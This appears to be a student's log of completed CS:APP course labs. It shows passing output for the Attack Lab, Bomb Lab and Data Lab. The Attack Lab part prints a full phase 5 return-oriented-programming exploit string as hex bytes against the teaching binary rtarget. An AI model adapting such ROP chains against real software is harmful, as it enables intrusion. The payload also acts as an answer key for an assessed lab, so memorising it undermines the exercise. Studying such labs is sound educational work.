-
CSAPP Attack Lab V.2016.01.11
$ ./hex2raw < input/phase_5.txt | ./rtarget -q Cookie: 0x59b997fa Type string:Touch3!: You called touch3("59b997fa") Valid solution for level 3 with target rtarget PASS: Would have posted the following: user id bovik course 15213-f15 lab attacklab result 1:PASS:0xffffffff:rtarget:3:88 88 88 88 88 88 88 88 88 88 88 88 88 88 88 88 88 88 88 88 88 88 88 88 88 88 88 88 88 88 88 88 88 88 88 88 88 88 88 88 06 1A 40 00 00 00 00 00 C5 19 40 00 00 00 00 00 AB 19 40 00 00 00 00 00 48 00 00 00 00 00 00 00 DD 19 40 00 00 00 00 00 34 1A 40 00 00 00 00 00 27 1A 40 00 00 00 00 00 D6 19 40 00 00 00 00 00 C5 19 40 00 00 00 00 00 FA 18 40 00 00 00 00 00 35 39 62 39 39 37 66 61
-
CSAPP Bomb Lab V.2016.01.12
$ ./bomb inputs.txt Welcome to my fiendish little bomb. You have 6 phases with which to blow yourself up. Have a nice day! Phase 1 defused. How about the next one? That's number 2. Keep going! Halfway there! So you got that one. Try this one. Good work! On to the next... Curses, you've found the secret phase! But finding it and solving it are quite different... Wow! You've defused the secret stage! Congratulations! You've defused the bomb!
-
CSAPP Data Lab V.2016.05.04。
$ ./btest Score Rating Errors Function 1 1 0 bitAnd 2 2 0 getByte 3 3 0 logicalShift 4 4 0 bitCount 4 4 0 bang 1 1 0 tmin 2 2 0 fitsBits 2 2 0 divpwr2 2 2 0 negate 3 3 0 isPositive 3 3 0 isLessOrEqual 4 4 0 ilog2 2 2 0 float_neg 4 4 0 float_i2f 4 4 0 float_twice Total points: 41/41